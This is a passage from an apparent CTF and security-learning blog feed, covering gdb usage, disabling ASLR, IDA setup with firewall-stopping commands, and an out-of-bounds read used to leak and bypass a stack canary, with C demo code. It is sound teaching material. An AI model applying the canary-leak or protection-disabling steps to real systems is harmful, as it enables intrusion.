shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$ </span><span class="language-bash">sysctl -w kernel.randomize_va_space=0</span></span><br></pre></td></tr></table></figure><p>这是一种<strong>临时改变</strong>随机策略的方法,重启之后将恢复默认。如果需要永久保存配置,需要在配置文件 /etc/sysctl.conf 中增加这个选项。</p><p><strong>方法三: 使用setarch控制单个程序的随机化</strong><br>如果你想历史关闭单个程序的ASLR,使用setarch是很好的选择。setarch命令如其名,改变程序的运行架构环境,并可以自定义环境flag。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">setarch `uname -m` -R 
./your_program</span><br></pre></td></tr></table></figure><p>-R参数代表关闭地址空间随机化(开启ADDR_NO_RANDOMIZE)</p><p><strong>方法四: 在GDB场景下,使用set disable-randomization off</strong><br>在调试特定程序时,可以通过 <code>set disable-randomization</code> 命令开启或者关闭地址空间随机化。默认是关闭随机化的,也就是on状态。</p><p>当然,这里开启,关闭和查看的方法看起来就比较正规了。</p><p>关闭ASLR:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set disable-randomization on</span><br></pre></td></tr></table></figure><p>开启ASLR:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set disable-randomization off</span><br></pre></td></tr></table></figure><p>查看ASLR状态:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show disable-randomization</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>[TOC]</p>
<blockquote>
<p>This article is a condensed version of another post of mine: the references and some extra explanation were removed so that only the key parts remain. If you want to learn to write shellcode, read <a href="https://www.rgzzplus.com/2022/08/08/L</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="shellcode" scheme="https://www.rgzzplus.com/tags/shellcode/"/>
</entry>
<entry>
<title>Usage of x in gdb</title>
<link href="https://www.rgzzplus.com/2022/09/06/gdb%E4%B8%ADx%E7%9A%84%E7%94%A8%E6%B3%95/"/>
<id>https://www.rgzzplus.com/2022/09/06/gdb%E4%B8%ADx%E7%9A%84%E7%94%A8%E6%B3%95/</id>
<published>2022-09-06T06:29:37.000Z</published>
<updated>2022-09-06T06:30:21.673Z</updated>
<content type="html"><![CDATA[<blockquote><p>Reposted from: <a href="https://www.jianshu.com/p/589308dd36dc">gdb ---- x命令详解</a></p><p>Author: Adam_0<br>Link: <a href="https://www.jianshu.com/p/589308dd36dc">https://www.jianshu.com/p/589308dd36dc</a><br>Source: 简书 (Jianshu)</p></blockquote><p>The examine command is abbreviated as x.<br>Format:</p><figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x/<span class="language-xml"><n/f/u></span> <addr></span><br></pre></td></tr></table></figure><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">n: a positive integer, the number of memory units to display, i.e. show the contents of n units starting at the given address;</span><br><span class="line">the size of one unit is set by the third parameter, u.</span><br><span class="line"></span><br><span class="line">f: the display format for the memory addr points to; s prints a string. Pay particular attention to the integer formats:</span><br><span class="line"> x hexadecimal.</span><br><span class="line"> d signed decimal.</span><br><span class="line"> u unsigned decimal.</span><br><span class="line"> o octal.</span><br><span class="line"> t binary.</span><br><span class="line"> a address: hexadecimal plus the nearest symbol, e.g. &lt;main+4&gt;.</span><br><span class="line"> c character.</span><br><span class="line"> f floating point.</span><br><span class="line"> i machine instruction (disassembly).</span><br><span class="line"></span><br><span class="line">u: how many bytes make up one memory unit; defaults to 4 (gdb then remembers the last size used). It can also be given as a letter:</span><br><span class="line"> b=1 byte, h=2 bytes, w=4 bytes, g=8 bytes.</span><br><span class="line"></span><br><span class="line"><addr>: the memory address.</span><br><span class="line">Format letters are o(octal), x(hex), d(decimal), u(unsigneddecimal),</span><br><span class="line">t(binary), f(float), a(address), i(instruction), c(char) and s(string).</span><br><span class="line">Size letters are b(byte), h(halfword), w(word), g(giant, 8bytes)</span><br></pre></td></tr></table></figure><p><strong>Example:</strong><br>x/3uh buf<br>reads memory starting at address buf:</p><p>3: three units,<br>u: unsigned decimal (not hexadecimal; x is the hex format),<br>h: halfwords, i.e. 2-byte units</p>]]></content>
<summary type="html"><blockquote>
<p>Reposted from: <a href="https://www.jianshu.com/p/589308dd36dc">gdb ---- x命令详解</a></p>
<p>Author: Adam_0<br>
Link: <a href="https://www.jians</summary>
<category term="Reposted" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="gdb" scheme="https://www.rgzzplus.com/tags/gdb/"/>
</entry>
<entry>
<title>Security forums and blogs</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E5%AE%89%E5%85%A8%E5%AA%92%E4%BD%93or%E5%8D%9A%E5%AE%A2/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E5%AE%89%E5%85%A8%E5%AA%92%E4%BD%93or%E5%8D%9A%E5%AE%A2/</id>
<published>2022-09-05T13:29:54.000Z</published>
<updated>2022-09-05T13:46:48.958Z</updated>
<content type="html"><![CDATA[<p>Media:</p><ul><li><a href="https://www.cnblogs.com/">博客园 (cnblogs)</a></li><li><a href="https://bbs.pediy.com/">看雪 (Pediy)</a></li><li><a href="https://www.blackhat.com/">blackhat</a></li><li><a href="https://www.bugku.com/forum.php">bugku</a></li><li><a href="http://www.icse-conferences.org/">ICSE</a></li><li><a href="https://geeknb.com/">极牛网 (geeknb)</a></li><li><a href="https://bbs.kafan.cn/forum.php?mod=forumdisplay&fid=7&filter=typeid&typeid=31">卡饭论坛 (kafan)</a></li><li><a href="https://www.freebuf.com/">FREEBUF</a></li><li><a href="https://blogsurf.io/">Blog Surf</a></li><li><a href="http://phrack.org/issues/60/10.html">PHRACK</a></li><li><a href="https://www.anquanke.com/">安全客 (Anquanke)</a></li><li><a href="https://packetstormsecurity.com/">packet_storm</a></li><li><a href="https://www.cnhackteam.org/">黑客世界论坛 (cnhackteam)</a></li><li><a href="https://www.t00ls.com/">t00ls</a></li><li><a href="https://xz.aliyun.com/">先知社区 (Xianzhi)</a></li></ul><p>Practice ranges:</p><ul><li><a href="https://adworld.xctf.org.cn/home/index">攻防世界 (adworld)</a></li><li><a href="https://ctf.bugku.com/index.html">CTF-bugku</a></li><li><a href="https://www.ctfhub.com/#/index">CTFhub</a></li><li><a href="https://book.nu1l.com/tasks/">从0到1:CTFer成长之路 (From 0 to 1: the CTFer's path)</a></li><li><a href="https://www.exploit-db.com/">Exploit Database</a></li><li><a href="http://www.shell-storm.org/shellcode/">shell-storm</a></li><li><a href="https://www.kancloud.cn/alex_wsc/android/506821"><strong>Android</strong></a></li></ul><p>Blogs:</p><ul><li><a href="https://www.cnblogs.com/2014asm/category/1310367.html">我是小三</a> (pwn)</li><li><a href="https://www.cnblogs.com/LY613313">爱喝奶茶的沐沐</a> (pwn)</li><li><a href="https://www.giantbranch.cn/">giantbranch</a> (fuzzing)</li><li><a href="https://www.jarvisw.com/">Jarvis</a> (pwn)</li><li><a href="https://jvns.ca/">Julia Evans</a> (expert)</li><li><a href="https://www.onctf.com/">骁隆</a> (pwn + web)</li><li><a href="https://v0w.top/">V0W’s Blog</a> (web)</li><li><a href="https://www.cnblogs.com/linuxsec/">linuxsec</a> (web)</li><li><a href="http://blog.rchapman.org/">Ryan A. Chapman</a> (expert)</li><li><a href="https://sploitfun.wordpress.com/">sploitF-U-N</a> (pwn)</li><li><a href="https://strcpy.me/">virusdefender’s blog</a> (pwn)</li><li><a href="http://www.fuzzysecurity.com/index.html">FuzzySecurity</a> (experts)</li></ul><blockquote><p>Other posts recommending blogs:</p><p><a href="https://zhuanlan.zhihu.com/p/23701240">https://zhuanlan.zhihu.com/p/23701240</a></p></blockquote>]]></content>
<summary type="html"><p>Media:</p>
<ul>
<li><a href="https://www.cnblogs.com/">博客园 (cnblogs)</a></li>
<li><a href="https://bbs.pediy.com/">看雪 (Pediy)</a></li>
<li><a href="https://ww</summary>
<category term="Bookmarks" scheme="https://www.rgzzplus.com/categories/%E6%94%B6%E8%97%8F%E5%A4%B9/"/>
<category term="Forums &amp; blogs" scheme="https://www.rgzzplus.com/tags/%E8%AE%BA%E5%9D%9B-%E5%8D%9A%E5%AE%A2/"/>
</entry>
<entry>
<title>Checking the Linux kernel version</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Blinux%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Blinux%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/</id>
<published>2022-09-05T13:28:04.000Z</published>
<updated>2022-09-05T13:46:39.722Z</updated>
<content type="html"><![CDATA[<blockquote><p>Reposted from: <a href="https://cloud.tencent.com/developer/article/1878840">Linux查看内核版本命令</a></p></blockquote><h2 id="使用uname命令查找linux内核"><a class="markdownIt-Anchor" href="#使用uname命令查找linux内核"></a> <strong>Finding the Linux kernel version with uname</strong></h2><p>uname is the Linux command for querying system information. It also tells you whether you are on a 32-bit or 64-bit system (<code>uname -m</code> prints the machine architecture, <code>uname -a</code> everything at once).</p><p>Open a terminal and run:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[linuxmi@linux:~/www.xxx.com]$ uname -r</span><br></pre></td></tr></table></figure><p>The output looks like this:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">5.3.0-28-generic</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><blockquote>
<p>Reposted from: <a href="https://cloud.tencent.com/developer/article/1878840">Linux查看内核版本命令</a></p>
</blockquote>
<h2 id="使用uname命令查找l</summary>
<category term="Reposted" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="kernel version" scheme="https://www.rgzzplus.com/tags/%E5%86%85%E6%A0%B8%E7%89%88%E6%9C%AC/"/>
</entry>
<entry>
<title>Linux package dependency problems</title>
<link href="https://www.rgzzplus.com/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/"/>
<id>https://www.rgzzplus.com/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/</id>
<published>2022-09-05T13:27:21.000Z</published>
<updated>2022-09-05T13:45:42.797Z</updated>
<content type="html"><![CDATA[<p>The first time I used pwndbg's heap command:<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192451610.png" alt="image-20220901192451610"></p><p>it said dependencies were missing and that I needed to install some library files.</p><p>But when I tried to install those libraries I hit a dependency conflict<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192638567.png" alt="image-20220901192638567"></p><p>It turned out that my libc6 was too new, and I had to install the older version of the library back</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install libc6=2.31-0kylin9.2</span><br></pre></td></tr></table></figure><p>Once the older library was installed, libc6-dbg installed fine!<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901192829669.png" alt="image-20220901192829669"></p><p>Running heap again now shows the information<br><img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/image-20220901193217714.png" alt="image-20220901193217714"></p><blockquote><p>Reference: <a href="https://www.cnblogs.com/EasonJim/p/7144017.html">查看指定软件所有版本</a></p></blockquote>]]></content>
<summary type="html"><p>The first time I used pwndbg's heap command:<br>
<img src="/2022/09/05/linux%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96%E9%97%AE%E9%A2%98/</summary>
<category term="Experience sharing" scheme="https://www.rgzzplus.com/categories/%E7%BB%8F%E9%AA%8C%E4%BA%A4%E6%B5%81/"/>
<category term="package dependencies" scheme="https://www.rgzzplus.com/tags/%E5%AE%89%E8%A3%85%E5%8C%85%E4%BE%9D%E8%B5%96/"/>
</entry>
<entry>
<title>Array out-of-bounds access</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/</id>
<published>2022-09-05T13:27:08.000Z</published>
<updated>2022-09-05T13:44:04.688Z</updated>
<content type="html"><![CDATA[<h1 id="1-数组越界"><a class="markdownIt-Anchor" href="#1-数组越界"></a> 1 Array out-of-bounds access</h1><p>First, distinguish <strong>out-of-bounds array access</strong> from <strong>overflow</strong> vulnerabilities:</p><ul><li>an out-of-bounds access can be a read or a write</li><li>an overflow is a write</li><li>some overflow vulnerabilities are, at bottom, out-of-bounds array accesses</li></ul><p>An out-of-bounds access is like pouring water into the wrong cup; an overflow is like water running over the rim of the cup.</p><h2 id="11-原理"><a class="markdownIt-Anchor" href="#11-原理"></a> 1.1 How it works</h2><p>Out-of-bounds access <strong>on the heap</strong>: heap memory is allocated by the program itself, so an index past the end reads or overwrites data that belongs to other chunks. If the data hit is a variable, its value changes; if it is a pointer, the program may crash.</p><p>Out-of-bounds access <strong>on the stack</strong>: the stack grows downward, and before a function is entered its arguments and the return address are pushed. If the access overwrites the saved ebp (frame base), esp no longer points where it should when the frame is torn down and the program misbehaves, usually by crashing; if the return address stored just above ebp is overwritten too, control flow can be hijacked.</p><p>The following program illustrates an out-of-bounds read:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string"><stdio.h></span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span>{</span><br><span class="line"><span class="type">int</span> index;</span><br><span class="line"><span class="type">int</span> <span class="built_in">array</span>[<span class="number">3</span>] = {<span class="number">111</span>,<span class="number">222</span>,<span class="number">333</span>};</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Enter array index: "</span>);</span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">"%d"</span>,&index);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Array element: array[%d] = %d\n"</span>, index, <span class="built_in">array</span>[index]); <span class="comment">// no bounds check: index can be anything scanf parsed</span></span><br><span class="line"> <span class="comment">//array[index] = 1;   // the same index as a write target would be an out-of-bounds write</span></span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Run the program and enter 2, then 4, as the index. For indices 0, 1 and 2 you get the real elements, but from index 3 onward the access leaves array; with 4, the program reads a value from the stack that it never meant to expose.</p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162857184.png" alt="image-20220904162857184"></p><p>In gdb, array[4] reads 0x4012A9, data that lies outside array. If the index goes far enough, the access reaches unmapped memory and the program crashes.</p><p>The same primitive can be used to read the stack canary, and therefore to bypass it.</p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162631275.png" alt="image-20220904162631275"></p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162118330.png" alt="image-20220904162118330"></p><p>canary = 0x3dd8e70f = 1037625103<sub>10</sub></p><p><img src="/2022/09/05/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C%E8%AE%BF%E9%97%AE/image-20220904162735865.png" alt="image-20220904162735865"></p><p>With the canary value in hand, a stack overflow that writes the same value back into [rbp-0x8] passes the check, and the return address behind it can then be pointed at shellcode.</p><p>Canary value from the gdb session: 0x9d5720fbb2e21300</p><blockquote><p>References:</p><p><a href="https://bbs.pediy.com/thread-246490.htm">整数溢出+数组越界</a></p><p>漏洞战争</p></blockquote>]]></content>
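<![CDATA[<p>Added example, not code from the original post: the out-of-bounds read above modelled in C, together with the canary leak the text describes and the bounds check that stops it. The stack frame is modelled as a struct so that the layout is fixed (on the real stack the compiler decides how far array[] is from the canary; the post's gdb session found it at [rbp-0x8]); the canary value is the one from that session, and a little-endian machine (x86-64) is assumed.</p>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of the post's stack frame. The real distance between array[] and the
 * canary is chosen by the compiler (gdb showed the canary at [rbp-0x8]); a
 * struct pins the layout so the out-of-bounds read is deterministic.
 * Assumes a little-endian machine (x86-64).
 */
struct frame {
    int      array[3];   /* {111, 222, 333} in the post's program */
    int      pad;
    uint64_t canary;     /* stands in for the stack-protector value */
};

/* Vulnerable pattern from the post: the user-supplied index is used as-is.
 * Reads through a char* so that indices 3..5 stay inside the struct; there is
 * deliberately no range check, exactly like array[index] in main(). */
int read_unchecked(const struct frame *f, int index)
{
    int v;
    memcpy(&v, (const char *)f->array + (long)index * (long)sizeof(int), sizeof v);
    return v;
}

/* Hardened version: reject anything outside [0, n). The index is a long so a
 * negative value from scanf("%d") cannot wrap into a huge unsigned index. */
int read_checked(const int *arr, size_t n, long index, int *out)
{
    if (index < 0 || (uint64_t)index >= n)
        return -1;
    *out = arr[index];
    return 0;
}

/* The post reads array[4] past a 3-element array; two such 4-byte reads
 * reassemble the 8-byte canary that sits after the array in this layout. */
uint64_t leak_canary(const struct frame *f)
{
    uint32_t lo = (uint32_t)read_unchecked(f, 4);   /* bytes 16..19 of the frame */
    uint32_t hi = (uint32_t)read_unchecked(f, 5);   /* bytes 20..23 */
    return ((uint64_t)hi << 32) | lo;
}

/* Builds the modelled frame with the given canary and leaks it back. */
uint64_t demo_leak(uint64_t canary)
{
    struct frame f = { {111, 222, 333}, 0, canary };
    return leak_canary(&f);
}

/* Same index against the checked reader: the element, or -1 when rejected. */
int demo_checked(long index)
{
    int arr[3] = {111, 222, 333};
    int v;
    return read_checked(arr, 3, index, &v) == 0 ? v : -1;
}

int main(void)
{
    /* canary value from the post's gdb session; note the 0x00 low byte */
    uint64_t canary = 0x9d5720fbb2e21300ULL;
    printf("leaked canary: 0x%016llx\n", (unsigned long long)demo_leak(canary));
    for (long i = -1; i <= 4; i++)
        printf("checked read, index %ld -> %d\n", i, demo_checked(i));
    return 0;
}
```

<p>The low byte of the leaked value is 0x00: glibc deliberately zeroes the least significant byte of the canary so that a string-based overflow cannot copy it intact, which is why an index-based read like this one, rather than a <code>%s</code> leak, is the usual way to recover it.</p>]]>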
<summary type="html"><h1 id="1-数组越界"><a class="markdownIt-Anchor" href="#1-数组越界"></a> 1 Array out-of-bounds access</h1>
<p>First, distinguish <strong>out-of-bounds array access</strong> from <strong>overflow</strong> vulnerabilities:</p>
<ul></summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="array out-of-bounds" scheme="https://www.rgzzplus.com/tags/%E6%95%B0%E7%BB%84%E8%B6%8A%E7%95%8C/"/>
</entry>
<entry>
<title>IDA remote debugging</title>
<link href="https://www.rgzzplus.com/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/"/>
<id>https://www.rgzzplus.com/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/</id>
<published>2022-09-05T13:26:31.000Z</published>
<updated>2022-09-05T13:43:24.310Z</updated>
<content type="html"><![CDATA[<blockquote><p>References:</p><p><a href="https://www.cnblogs.com/2014asm/p/10098005.html">linux漏洞分析入门笔记-栈溢出</a></p><p><a href="https://blog.csdn.net/u014101410/article/details/102853014">Windows下IDA远程调试Linux程序,无法连接</a></p></blockquote><blockquote><p>IDA 7.5</p><p>Kylin V10</p></blockquote><h2 id="0x00环境配置"><a class="markdownIt-Anchor" href="#0x00环境配置"></a> 0x00: Environment setup</h2><p>Remote-debugging a Linux program with IDA takes the following steps:</p><p>1. Prepare the Linux side first. From the dbgsrv folder of the IDA installation, copy linux_server (32-bit targets) or linux_server64 (64-bit targets; named linux_serverx64 in older releases) into the directory of the program to be debugged. Make it executable (<code>chmod +x linux_server*</code> is enough; the original <code>chmod 777</code> is wider than needed) and start it with <code>./linux_server</code> or <code>./linux_server64</code>. The server runs whatever the connecting IDA tells it to, as the user it was started by, so outside an isolated lab network start it with a password (<code>-P</code>).</p><p>2. In IDA choose Debugger → Run → Remote Linux debugger. As in the figures below, fill in the application path, the working directory, the parameters (leave empty if there are none), the host IP and the port, then click OK. Relative paths are resolved relative to the directory linux_server / linux_server64 was started from.</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210175845721-2080206661.jpg" alt="img"></p><p>Figure 1</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210180102331-1234975417.jpg" alt="img"></p><p>Figure 2</p><p><img src="https://img2018.cnblogs.com/blog/693524/201812/693524-20181210180122795-1138987496.jpg" alt="img"></p><p>Figure 3</p><p>3. Set breakpoints on the key functions and start dynamic debugging, as in the figure below:</p><p><img src="/2022/09/05/IDA%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95/693524-20181210180219408-1171249507.jpg" alt="img"></p><p>Figure 4</p><p>Common shortcuts:</p><p>a. Step over: F8</p><p>b. Step into: F7</p><p>c. Run to cursor: F4</p><p>d. Toggle breakpoint: F2</p><p>e. Continue: F9</p><h2 id="0x01-问题"><a class="markdownIt-Anchor" href="#0x01-问题"></a> 0x01 Problems</h2><p>If the target answers ping but IDA still cannot connect, a firewall on the target is the usual cause.</p><p>CentOS 7 and later use firewalld by default (it is built on iptables, but the iptables service itself is not installed), so stopping firewalld is enough:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl stop firewalld.service && sudo systemctl disable firewalld.service</span><br></pre></td></tr></table></figure><p>On other systems, stop the firewall in the same spirit:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service iptables stop</span><br></pre></td></tr></table></figure><p>This resolves it on Ubuntu and CentOS. On Kali, just find the IP and run linux_server with sudo.</p><p>Turning the firewall off is the blunt fix; opening only the debug server's port (23946/tcp by default) on the lab machine is the narrower one.</p>]]></content>
<summary type="html"><blockquote>
<p>References:</p>
<p> <a href="https://www.cnblogs.com/2014asm/p/10098005.html">linux漏洞分析入门笔记-栈溢出</a></p>
<p> <a href="https://blo</summary>
<category term="Experience sharing" scheme="https://www.rgzzplus.com/categories/%E7%BB%8F%E9%AA%8C%E4%BA%A4%E6%B5%81/"/>
<category term="IDA" scheme="https://www.rgzzplus.com/tags/IDA/"/>
</entry>
<entry>
<title>Installing IDA on Linux</title>
<link href="https://www.rgzzplus.com/2022/09/05/linux%E5%AE%89%E8%A3%85ida/"/>
<id>https://www.rgzzplus.com/2022/09/05/linux%E5%AE%89%E8%A3%85ida/</id>
<published>2022-09-05T13:26:17.000Z</published>
<updated>2022-09-05T13:42:51.734Z</updated>
<content type="html"><![CDATA[<p>Reposted from: <strong><a href="https://github.com/AngelKitty/IDA7.0">安装IDA7.0</a></strong></p><p>Taking Ubuntu 18.04 as the example. Download <a href="https://github.com/AngelKitty/IDA7.0/blob/master/idafree70_linux.run">idafree70_linux.run</a> to the local machine, then install IDA with the following commands. (The .run file is a third-party redistribution of the free IDA installer; for anything beyond a throwaway lab box, fetch the installer from Hex-Rays directly.)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/AngelKitty/IDA7.0.git</span><br><span class="line">cd IDA7.0/</span><br><span class="line">chmod +x idafree70_linux.run</span><br><span class="line">./idafree70_linux.run</span><br></pre></td></tr></table></figure><p>If git is not installed yet, get it with:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install git</span><br></pre></td></tr></table></figure><p>Once the download finishes, open a terminal in that directory and run the installer (the <code>./idafree70_linux.run</code> line above) to start the setup steps.</p><p>Then keep clicking Next to complete the installation. When asked for the install directory, change the default and choose a directory under <code>/opt/...</code> for IDA.</p><p>Then create a symbolic link in the <code>/usr/bin</code> folder.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ln -s /opt/idafree-7.0/ida64 /usr/bin</span><br></pre></td></tr></table></figure><p>Now test the ida64 command; it should work.</p><p>If you run into "Package ‘libstdc++.so.5’ has no installation candidate", the following command fixes it.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt-get install libstdc++5:i386</span><br></pre></td></tr></table></figure><p>Then you can start your IDA journey.</p>]]></content>
<summary type="html"><p>Reposted from: <strong><a href="https://github.com/AngelKitty/IDA7.0">安装IDA7.0</a></strong></p>
<p>Taking Ubuntu 18.04 as the example. Download <a href="https://github.co</summary>
<category term="Reposted" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="IDA" scheme="https://www.rgzzplus.com/tags/IDA/"/>
</entry>
<entry>
<title>Checking the glibc version</title>
<link href="https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/"/>
<id>https://www.rgzzplus.com/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/</id>
<published>2022-09-05T13:26:04.000Z</published>
<updated>2022-09-05T13:34:31.809Z</updated>
<content type="html"><![CDATA[<blockquote><p>Reposted from: <a href="https://www.cnblogs.com/motadou/p/4473966.html">glibc查看版本号</a></p></blockquote><p>glibc is the GNU implementation of the standard C library; nearly every program written in C/C++ depends on it at run time. To read the glibc source for the machine in front of you, you first need its version number, then download that version from the glibc site.</p><h3 id="查看当前机器glibc的版本号"><a class="markdownIt-Anchor" href="#查看当前机器glibc的版本号"></a> Finding the glibc version of the current machine</h3><p>Method 1: use <code>ldd</code> to see which libc an executable links against.<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424135401650-138960923.png" alt="img"><br>The system loads libc-2.19.so, so the glibc version is 2.19.</p><p>Method 2: execute libc.so itself; the build banner it prints includes the version.<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200427101256592-1321326922.png" alt="img"></p><p>Method 3: <code>ldd --version</code> (ldd ships with glibc, so its version is glibc's).<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424135802159-1955290017.png" alt="img"></p><p>Method 4: <code>getconf GNU_LIBC_VERSION</code>.<br><img src="/2022/09/05/%E6%9F%A5%E7%9C%8Bglibc%E7%89%88%E6%9C%AC%E5%8F%B7/47736-20200424140519131-472352609.png" alt="img"></p><blockquote><p>Downloading the glibc source</p><p>glibc home page: <a href="https://www.gnu.org/software/libc/">https://www.gnu.org/software/libc/</a><br>glibc source tarballs: <a href="https://ftp.gnu.org/gnu/glibc/">https://ftp.gnu.org/gnu/glibc/</a></p></blockquote>]]></content>
<summary type="html"><blockquote>
<p>Reposted from: <a href="https://www.cnblogs.com/motadou/p/4473966.html">glibc查看版本号</a></p>
</blockquote>
<p>glibc is the GNU implementation of the standard C library; programs written in C/C+</summary>
<category term="Reposted" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="glibc version" scheme="https://www.rgzzplus.com/tags/glibc%E7%89%88%E6%9C%AC%E5%8F%B7/"/>
</entry>
<entry>
<title>Viewing system processes on Linux</title>
<link href="https://www.rgzzplus.com/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/"/>
